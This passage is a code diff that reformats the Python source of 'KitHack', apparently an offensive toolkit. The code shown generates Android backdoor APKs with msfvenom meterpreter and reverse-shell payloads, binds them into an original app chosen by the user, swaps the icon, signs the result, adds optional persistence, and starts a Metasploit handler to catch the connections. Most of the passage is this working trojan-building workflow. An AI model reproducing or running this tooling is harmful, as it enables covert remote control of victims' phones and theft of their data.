generating the backdoor\n".format( - RED - ) - ) + "\n{0}[X] An error has occured whilst generating the backdoor\n" + .format(RED)) time.sleep(3) os.system( "rm -rf output/payload output/payload.apk output/kithack.apk" ) - pause("{}Press any key to continue...".format(GREEN)) + pause( + "{}Press any key to continue...".format(GREEN)) os.system("systemctl stop postgresql && clear") main() # Salida de bucle - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format( + YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] var = input( - "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format( - GREEN, RED, DEFAULT - ) - ) - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)) + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) time.sleep(4) os.system( - "systemctl start postgresql && msfvenom -p android/meterpreter/reverse_tcp LHOST={0} LPORT={1} R > output/{2}.apk".format( - LHOST, LPORT, mainout - ) - ) + "systemctl start postgresql && msfvenom -p android/meterpreter/reverse_tcp LHOST={0} LPORT={1} R > output/{2}.apk" + .format(LHOST, LPORT, mainout)) location = os.getcwd() if os.stat("output/{}.apk".format(mainout)).st_size != 0: while var.upper() != "N": - print( - "\n{0}[*] Generating persistence file...{1}".format( - GREEN, DEFAULT - ) - ) + print("\n{0}[*] Generating persistence file...{1}". + format(GREEN, DEFAULT)) time.sleep(4) ext = mainout + ".apk" - subprocess.Popen( - ["bash", "-c", ". lib/apkf.sh; pers output/" + ext] - ) - print( - "{0}File: {1}/output/{2}.sh".format( - DEFAULT, location, mainout - ) - ) + subprocess.Popen([ + "bash", "-c", + ". lib/apkf.sh; pers output/" + ext + ]) + print("{0}File: {1}/output/{2}.sh".format( + DEFAULT, location, mainout)) break print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format( - GREEN, DEFAULT, location, mainout - ) - ) - if ( - input( - "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( - GREEN, RED, DEFAULT - ) - ).upper() - != "Y" - ): + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk". + format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != "Y"): os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter/reverse_tcp; exploit\'"'.format( - LHOST, LPORT - ) - ) - pause("\n{}Press any key to continue...".format(GREEN)) + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter/reverse_tcp; exploit\'"' + .format(LHOST, LPORT)) + pause( + "\n{}Press any key to continue...".format( + GREEN)) os.system("systemctl stop postgresql && clear") main() else: os.system( 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/meterpreter/reverse_tcp; exploit\'"' ) - pause("\n{}Press any key to continue...".format(GREEN)) + pause( + "\n{}Press any key to continue...".format( + GREEN)) os.system("systemctl stop postgresql && clear") main() else: print( - "\n{0}[X] An error has occured whilst generating the backdoor\n".format( - RED - ) - ) + "\n{0}[X] An error has occured whilst generating the backdoor\n" + .format(RED)) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) os.system("systemctl stop postgresql && clear") main() elif a == "02": - print("{0}\n [*] {1}Select Method:\n".format(DEFAULT, GREEN)) - print( - "{0}[01]{1} Use the old Metasploit method".format(WHITE, YELLOW) - ) - print("{0}[02]{1} Use the new KitHack method".format(WHITE, YELLOW)) + print("{0}\n [*] {1}Select Method:\n".format( + DEFAULT, GREEN)) + print("{0}[01]{1} Use the old Metasploit method".format( + WHITE, YELLOW)) + print("{0}[02]{1} Use the new KitHack method".format( + WHITE, YELLOW)) m = input("{0}KitHack >> {1}".format(RED, DEFAULT)) m = m.zfill(2) if m == "01": run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + LHOST = input("\n{0}SET LHOST: {1}".format( + YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format( + YELLOW, DEFAULT)) Tk().withdraw() APK = filedialog.askopenfilename( title="KITHACK - SELECT APK ORIGINAL", - filetypes=(("apk files", "*.apk"), ("all files", "*.*")), + filetypes=(("apk files", "*.apk"), ("all files", + "*.*")), ) print("\n{0}APK ORIGINAL: {1}".format(YELLOW, APK)) - OUT = input( - "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT) - ) + OUT = input("\n{0}Output File Name: {1}".format( + YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] var = input( - "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format( - GREEN, RED, DEFAULT - ) - ) - print( - "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT) - ) + "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)) + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) time.sleep(4) os.system( - "systemctl start postgresql && msfvenom -x {0} -p android/meterpreter/reverse_tcp LHOST={1} LPORT={2} > output/{3}.apk".format( - APK, LHOST, LPORT, mainout - ) - ) + "systemctl start postgresql && msfvenom -x {0} -p android/meterpreter/reverse_tcp LHOST={1} LPORT={2} > output/{3}.apk" + .format(APK, LHOST, LPORT, mainout)) location = os.getcwd() - if os.stat("output/{}.apk".format(mainout)).st_size != 0: + if os.stat( + "output/{}.apk".format(mainout)).st_size != 0: while var.upper() != "N": print( - "\n{0}[*] Generating persistence file...{1}".format( - GREEN, DEFAULT - ) - ) + "\n{0}[*] Generating persistence file...{1}" + .format(GREEN, DEFAULT)) time.sleep(4) ext = mainout + ".apk" - subprocess.Popen( - ["bash", "-c", ". lib/apkf.sh; pers output/" + ext] - ) - print( - "{0}File: {1}/output/{2}.sh".format( - DEFAULT, location, mainout - ) - ) + subprocess.Popen([ + "bash", "-c", + ". lib/apkf.sh; pers output/" + ext + ]) + print("{0}File: {1}/output/{2}.sh".format( + DEFAULT, location, mainout)) break print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format( - GREEN, DEFAULT, location, mainout - ) - ) - if ( - input( - "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( - GREEN, RED, DEFAULT - ) - ).upper() - != "Y" - ): + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk" + .format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != + "Y"): os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter/reverse_tcp; exploit\'"'.format( - LHOST, LPORT - ) - ) - pause( - "\n{}Press any key to continue...".format(GREEN) - ) - os.system("systemctl stop postgresql && clear") + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter/reverse_tcp; exploit\'"' + .format(LHOST, LPORT)) + pause("\n{}Press any key to continue...". + format(GREEN)) + os.system( + "systemctl stop postgresql && clear") main() else: os.system( 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/meterpreter/reverse_tcp; exploit\'"' ) - pause( - "\n{}Press any key to continue...".format(GREEN) - ) - os.system("systemctl stop postgresql && clear") + pause("\n{}Press any key to continue...". + format(GREEN)) + os.system( + "systemctl stop postgresql && clear") main() else: print( - "\n{0}[X] An error has occured whilst generating the backdoor\n".format( - RED - ) - ) + "\n{0}[X] An error has occured whilst generating the backdoor\n" + .format(RED)) time.sleep(3) - pause("{}Press any key to continue...".format(GREEN)) + pause( + "{}Press any key to continue...".format(GREEN)) os.system("systemctl stop postgresql && clear") main() elif m == "02": run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + LHOST = input("\n{0}SET LHOST: {1}".format( + YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format( + YELLOW, DEFAULT)) Tk().withdraw() APK = filedialog.askopenfilename( title="KITHACK - SELECT APK ORIGINAL", - filetypes=(("apk files", "*.apk"), ("all files", "*.*")), + filetypes=(("apk files", "*.apk"), ("all files", + "*.*")), ) print("\n{0}APK ORIGINAL: {1}".format(YELLOW, APK)) - OUT = input( - "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT) - ) + OUT = input("\n{0}Output File Name: {1}".format( + YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] var = input( - "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format( - GREEN, RED, DEFAULT - ) - ) - print( - "\n{0}[*] Generating payload...{1}".format(GREEN, DEFAULT) - ) + "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)) + print("\n{0}[*] Generating payload...{1}".format( + GREEN, DEFAULT)) time.sleep(4) os.system( - "systemctl start postgresql && msfvenom -p android/meterpreter/reverse_tcp LPORT={0} LHOST={1} R > output/payload.apk".format( - LPORT, LHOST - ) - ) + "systemctl start postgresql && msfvenom -p android/meterpreter/reverse_tcp LPORT={0} LHOST={1} R > output/payload.apk" + .format(LPORT, LHOST)) location = os.getcwd() - print( - "{0}[*] Decompiling original APK...{1}".format( - GREEN, DEFAULT - ) - ) + print("{0}[*] Decompiling original APK...{1}".format( + GREEN, DEFAULT)) time.sleep(4) os.system( - "cp {0} {1}/output/original.apk && apktool d -f -o output/original output/original.apk".format( - APK, location - ) - ) - print( - "\n{0}[*] Decompiling payload APK...{1}".format( - GREEN, DEFAULT - ) - ) + "cp {0} {1}/output/original.apk && apktool d -f -o output/original output/original.apk" + .format(APK, location)) + print("\n{0}[*] Decompiling payload APK...{1}".format( + GREEN, DEFAULT)) time.sleep(4) - os.system("apktool d -f -o output/payload output/payload.apk") - print( - "\n{0}[*] Configuring RAT Payload...{1}".format( - GREEN, DEFAULT - ) + os.system( + "apktool d -f -o output/payload output/payload.apk" ) + print("\n{0}[*] Configuring RAT Payload...{1}".format( + GREEN, DEFAULT)) time.sleep(4) subprocess.Popen(["bash", "-c", ". lib/apkf.sh; rat"]) - print("\n{0}[*] Compiling RAT APK...{1}".format(GREEN, DEFAULT)) + print("\n{0}[*] Compiling RAT APK...{1}".format( + GREEN, DEFAULT)) time.sleep(4) - os.system("apktool b output/original -o output/kithack.apk") + os.system( + "apktool b output/original -o output/kithack.apk") if os.path.isfile("output/kithack.apk"): - print("\n{0}[*] Signing APK...{1}".format(GREEN, DEFAULT)) + print("\n{0}[*] Signing APK...{1}".format( + GREEN, DEFAULT)) time.sleep(4) os.system( "jarsigner -keystore certificate.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA output/kithack.apk android" ) time.sleep(4) os.system( - "zipalign 4 output/kithack.apk output/{0}.apk".format( - mainout - ) - ) + "zipalign 4 output/kithack.apk output/{0}.apk". + format(mainout)) while var.upper() != "N": print( - "\n{0}[*] Generating persistence file...{1}".format( - GREEN, DEFAULT - ) - ) + "\n{0}[*] Generating persistence file...{1}" + .format(GREEN, DEFAULT)) time.sleep(4) ext = mainout + ".apk" - subprocess.Popen( - ["bash", "-c", ". lib/apkf.sh; pers output/" + ext] - ) - print( - "{0}File: {1}/output/{2}.sh".format( - DEFAULT, location, mainout - ) - ) + subprocess.Popen([ + "bash", "-c", + ". lib/apkf.sh; pers output/" + ext + ]) + print("{0}File: {1}/output/{2}.sh".format( + DEFAULT, location, mainout)) break - print( - "\n{0}[*] Deleting temporary files...{1}".format( - GREEN, DEFAULT - ) - ) + print("\n{0}[*] Deleting temporary files...{1}". + format(GREEN, DEFAULT)) time.sleep(4) os.system( "rm -rf output/original output/payload output/original.apk output/payload.apk output/kithack.apk" ) print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format( - GREEN, DEFAULT, location, mainout - ) - ) - if ( - input( - "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( - GREEN, RED, DEFAULT - ) - ).upper() - != "Y" - ): + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk" + .format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != + "Y"): os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter/reverse_tcp; exploit\'"'.format( - LHOST, LPORT - ) - ) - pause( - "\n{}Press any key to continue...".format(GREEN) - ) - os.system("systemctl stop postgresql && clear") + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter/reverse_tcp; exploit\'"' + .format(LHOST, LPORT)) + pause("\n{}Press any key to continue...". + format(GREEN)) + os.system( + "systemctl stop postgresql && clear") main() else: os.system( 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/meterpreter/reverse_tcp; exploit\'"' ) - pause( - "\n{}Press any key to continue...".format(GREEN) - ) - os.system("systemctl stop postgresql && clear") + pause("\n{}Press any key to continue...". + format(GREEN)) + os.system( + "systemctl stop postgresql && clear") main() else: print( - "\n{0}[X] An error has occured whilst generating the backdoor\n".format( - RED - ) - ) + "\n{0}[X] An error has occured whilst generating the backdoor\n" + .format(RED)) time.sleep(3) os.system( "rm -rf output/original output/payload output/original.apk output/payload.apk output/kithack.apk" ) - pause("{}Press any key to continue...".format(GREEN)) + pause( + "{}Press any key to continue...".format(GREEN)) os.system("systemctl stop postgresql && clear") main() @@ -4947,471 +4062,393 @@ def main(): if a == "01": run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - while ( - input( - "\n{0}[!] ¿Desea modificar el nombre/icono predeterminados? (y/n)\n{1}KitHack >> {2}".format( - GREEN, RED, DEFAULT - ) - ).upper() - != "Y" - ): + LHOST = input("\n{0}SET LHOST: {1}".format( + YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format( + YELLOW, DEFAULT)) + while (input( + "\n{0}[!] ¿Desea modificar el nombre/icono predeterminados? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != "Y"): break else: Tk().withdraw() icon = filedialog.askopenfilename( title="KITHACK - SELECT ICON PNG", - filetypes=(("png files", "*.png"), ("all files", "*.*")), + filetypes=(("png files", "*.png"), ("all files", + "*.*")), ) print("\n{0}ICON: {1}".format(YELLOW, icon)) - OUT = input( - "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT) - ) + OUT = input("\n{0}Output File Name: {1}".format( + YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] var = input( - "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format( - GREEN, RED, DEFAULT - ) - ) + "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)) file = open("/tmp/data.txt", "w") file.write(icon + "\n") file.write(mainout) file.close() - print( - "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT) - ) + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) time.sleep(4) os.system( - "systemctl start postgresql && msfvenom -p android/shell/reverse_http LHOST={0} LPORT={1} R > output/payload.apk".format( - LHOST, LPORT - ) - ) - print("{0}[*] Decompiling APK...{1}".format(GREEN, DEFAULT)) + "systemctl start postgresql && msfvenom -p android/shell/reverse_http LHOST={0} LPORT={1} R > output/payload.apk" + .format(LHOST, LPORT)) + print("{0}[*] Decompiling APK...{1}".format( + GREEN, DEFAULT)) time.sleep(4) - os.system("apktool d -f -o output/payload output/payload.apk") - print( - "\n{0}[*] Configuring icon change...{1}".format( - GREEN, DEFAULT - ) + os.system( + "apktool d -f -o output/payload output/payload.apk" ) + print("\n{0}[*] Configuring icon change...{1}".format( + GREEN, DEFAULT)) time.sleep(4) subprocess.Popen(["bash", "-c", ". lib/apkf.sh; icon"]) - print("\n{0}[*] Compiling RAT APK...{1}".format(GREEN, DEFAULT)) + print("\n{0}[*] Compiling RAT APK...{1}".format( + GREEN, DEFAULT)) time.sleep(4) - os.system("apktool b output/payload -o output/kithack.apk") + os.system( + "apktool b output/payload -o output/kithack.apk") location = os.getcwd() if os.path.isfile("output/kithack.apk"): - print("\n{0}[*] Signing APK...{1}".format(GREEN, DEFAULT)) + print("\n{0}[*] Signing APK...{1}".format( + GREEN, DEFAULT)) time.sleep(4) os.system( "jarsigner -keystore certificate.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA output/kithack.apk android" ) time.sleep(4) os.system( - "zipalign 4 output/kithack.apk output/{0}.apk".format( - mainout - ) - ) + "zipalign 4 output/kithack.apk output/{0}.apk". + format(mainout)) while var.upper() != "N": print( - "\n{0}[*] Generating persistence file...{1}".format( - GREEN, DEFAULT - ) - ) + "\n{0}[*] Generating persistence file...{1}" + .format(GREEN, DEFAULT)) time.sleep(4) ext = mainout + ".apk" - subprocess.Popen( - ["bash", "-c", ". lib/apkf.sh; pers output/" + ext] - ) - print( - "{0}File: {1}/output/{2}.sh".format( - DEFAULT, location, mainout - ) - ) + subprocess.Popen([ + "bash", "-c", + ". lib/apkf.sh; pers output/" + ext + ]) + print("{0}File: {1}/output/{2}.sh".format( + DEFAULT, location, mainout)) break - print( - "\n{0}[*] Deleting temporary files...{1}".format( - GREEN, DEFAULT - ) - ) + print("\n{0}[*] Deleting temporary files...{1}". + format(GREEN, DEFAULT)) time.sleep(4) os.system( "rm -rf output/payload output/payload.apk output/kithack.apk" ) print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format( - GREEN, DEFAULT, location, mainout - ) - ) - if ( - input( - "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( - GREEN, RED, DEFAULT - ) - ).upper() - != "Y" - ): + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk" + .format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != + "Y"): os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/shell/reverse_http; exploit\'"'.format( - LHOST, LPORT - ) - ) - pause( - "\n{}Press any key to continue...".format(GREEN) - ) - os.system("systemctl stop postgresql && clear") + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/shell/reverse_http; exploit\'"' + .format(LHOST, LPORT)) + pause("\n{}Press any key to continue...". + format(GREEN)) + os.system( + "systemctl stop postgresql && clear") main() else: os.system( 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/shell/reverse_http; exploit\'"' ) - pause( - "\n{}Press any key to continue...".format(GREEN) - ) - os.system("systemctl stop postgresql && clear") + pause("\n{}Press any key to continue...". + format(GREEN)) + os.system( + "systemctl stop postgresql && clear") main() else: print( - "\n{0}[X] An error has occured whilst generating the backdoor\n".format( - RED - ) - ) + "\n{0}[X] An error has occured whilst generating the backdoor\n" + .format(RED)) time.sleep(3) os.system( "rm -rf output/payload output/payload.apk output/kithack.apk" ) - pause("{}Press any key to continue...".format(GREEN)) + pause( + "{}Press any key to continue...".format(GREEN)) os.system("systemctl stop postgresql && clear") main() # Salida de bucle - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format( + YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] var = input( - "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format( - GREEN, RED, DEFAULT - ) - ) - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)) + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) time.sleep(4) os.system( - "systemctl start postgresql && msfvenom -p android/shell/reverse_http LHOST={0} LPORT={1} R > output/{2}.apk".format( - LHOST, LPORT, mainout - ) - ) + "systemctl start postgresql && msfvenom -p android/shell/reverse_http LHOST={0} LPORT={1} R > output/{2}.apk" + .format(LHOST, LPORT, mainout)) location = os.getcwd() if os.stat("output/{}.apk".format(mainout)).st_size != 0: while var.upper() != "N": - print( - "\n{0}[*] Generating persistence file...{1}".format( - GREEN, DEFAULT - ) - ) + print("\n{0}[*] Generating persistence file...{1}". + format(GREEN, DEFAULT)) time.sleep(4) ext = mainout + ".apk" - subprocess.Popen( - ["bash", "-c", ". lib/apkf.sh; pers output/" + ext] - ) - print( - "{0}File: {1}/output/{2}.sh".format( - DEFAULT, location, mainout - ) - ) + subprocess.Popen([ + "bash", "-c", + ". lib/apkf.sh; pers output/" + ext + ]) + print("{0}File: {1}/output/{2}.sh".format( + DEFAULT, location, mainout)) break print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format( - GREEN, DEFAULT, location, mainout - ) - ) - if ( - input( - "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( - GREEN, RED, DEFAULT - ) - ).upper() - != "Y" - ): + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk". + format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != "Y"): os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/shell/reverse_http; exploit\'"'.format( - LHOST, LPORT - ) - ) - pause("\n{}Press any key to continue...".format(GREEN)) + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/shell/reverse_http; exploit\'"' + .format(LHOST, LPORT)) + pause( + "\n{}Press any key to continue...".format( + GREEN)) os.system("systemctl stop postgresql && clear") main() else: os.system( 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/shell/reverse_http; exploit\'"' ) - pause("\n{}Press any key to continue...".format(GREEN)) + pause( + "\n{}Press any key to continue...".format( + GREEN)) os.system("systemctl stop postgresql && clear") main() else: print( - "\n{0}[X] An error has occured whilst generating the backdoor\n".format( - RED - ) - ) + "\n{0}[X] An error has occured whilst generating the backdoor\n" + .format(RED)) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) os.system("systemctl stop postgresql && clear") main() elif a == "02": - print("{0}\n [*] {1}Select Method:\n".format(DEFAULT, GREEN)) - print( - "{0}[01]{1} Use the old Metasploit method".format(WHITE, YELLOW) - ) - print("{0}[02]{1} Use the new KitHack method".format(WHITE, YELLOW)) + print("{0}\n [*] {1}Select Method:\n".format( + DEFAULT, GREEN)) + print("{0}[01]{1} Use the old Metasploit method".format( + WHITE, YELLOW)) + print("{0}[02]{1} Use the new KitHack method".format( + WHITE, YELLOW)) m = input("{0}KitHack >> {1}".format(RED, DEFAULT)) m = m.zfill(2) if m == "01": run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + LHOST = input("\n{0}SET LHOST: {1}".format( + YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format( + YELLOW, DEFAULT)) Tk().withdraw() APK = filedialog.askopenfilename( title="KITHACK - SELECT APK ORIGINAL", - filetypes=(("apk files", "*.apk"), ("all files", "*.*")), + filetypes=(("apk files", "*.apk"), ("all files", + "*.*")), ) print("\n{0}APK ORIGINAL: {1}".format(YELLOW, APK)) - OUT = input( - "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT) - ) + OUT = input("\n{0}Output File Name: {1}".format( + YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] var = input( - "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format( - GREEN, RED, DEFAULT - ) - ) - print( - "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT) - ) + "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)) + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) time.sleep(4) os.system( - "systemctl start postgresql && msfvenom -x {0} -p android/shell/reverse_http LHOST={1} LPORT={2} > output/{3}.apk".format( - APK, LHOST, LPORT, mainout - ) - ) + "systemctl start postgresql && msfvenom -x {0} -p android/shell/reverse_http LHOST={1} LPORT={2} > output/{3}.apk" + .format(APK, LHOST, LPORT, mainout)) location = os.getcwd() - if os.stat("output/{}.apk".format(mainout)).st_size != 0: + if os.stat( + "output/{}.apk".format(mainout)).st_size != 0: while var.upper() != "N": print( - "\n{0}[*] Generating persistence file...{1}".format( - GREEN, DEFAULT - ) - ) + "\n{0}[*] Generating persistence file...{1}" + .format(GREEN, DEFAULT)) time.sleep(4) ext = mainout + ".apk" - subprocess.Popen( - ["bash", "-c", ". lib/apkf.sh; pers output/" + ext] - ) - print( - "{0}File: {1}/output/{2}.sh".format( - DEFAULT, location, mainout - ) - ) + subprocess.Popen([ + "bash", "-c", + ". lib/apkf.sh; pers output/" + ext + ]) + print("{0}File: {1}/output/{2}.sh".format( + DEFAULT, location, mainout)) break print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format( - GREEN, DEFAULT, location, mainout - ) - ) - if ( - input( - "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( - GREEN, RED, DEFAULT - ) - ).upper() - != "Y" - ): + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk" + .format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != + "Y"): os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/shell/reverse_http; exploit\'"'.format( - LHOST, LPORT - ) - ) - pause( - "\n{}Press any key to continue...".format(GREEN) - ) - os.system("systemctl stop postgresql && clear") + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/shell/reverse_http; exploit\'"' + .format(LHOST, LPORT)) + pause("\n{}Press any key to continue...". + format(GREEN)) + os.system( + "systemctl stop postgresql && clear") main() else: os.system( 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/shell/reverse_http; exploit\'"' ) - pause( - "\n{}Press any key to continue...".format(GREEN) - ) - os.system("systemctl stop postgresql && clear") + pause("\n{}Press any key to continue...". + format(GREEN)) + os.system( + "systemctl stop postgresql && clear") main() else: print( - "\n{0}[X] An error has occured whilst generating the backdoor\n".format( - RED - 